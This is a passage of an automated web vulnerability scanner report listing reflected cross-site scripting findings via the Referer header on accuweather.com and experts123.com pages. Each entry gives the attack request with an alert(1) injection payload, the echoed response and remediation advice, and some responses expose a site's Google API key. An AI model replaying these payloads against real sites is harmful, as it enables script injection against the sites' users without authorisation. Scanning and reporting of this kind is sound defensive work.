Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

4.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /maps-satellite.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64040
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:14 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

4.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "e2434";alert(1)//40b9502e47";
var RSQ = true;

$(function() {
experts123.Question.initialize(828301, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=d80de';alert(1)//2bbe976dfa9');
});


</script>
...[SNIP]...

4.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=58da2';alert(1)//bbd7524fdca');
});


</script>
...[SNIP]...

4.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "bcd6c";alert(1)//f1f27091f7b";
var RSQ = true;

$(function() {
experts123.Question.initialize(630175, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=fdc6b';alert(1)//1fcabebdc24');
});


</script>
...[SNIP]...

4.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "25f3f";alert(1)//41fc69da3be";
var RSQ = true;

$(function() {
experts123.Question.initialize(821025, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=ccc8e';alert(1)//6bb3a5f1c5f');
});


</script>
...[SNIP]...

4.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "1947f";alert(1)//760c35e1ead";
var RSQ = true;

$(function() {
experts123.Question.initialize(880822, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=a50b1';alert(1)//6a7613daa75');
});


</script>
...[SNIP]...

4.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d5395";alert(1)//8cf555a3bfa";
var RSQ = true;

$(function() {
experts123.Question.initialize(893817, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=1a44e';alert(1)//5f700a46bff');
});


</script>
...[SNIP]...

4.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
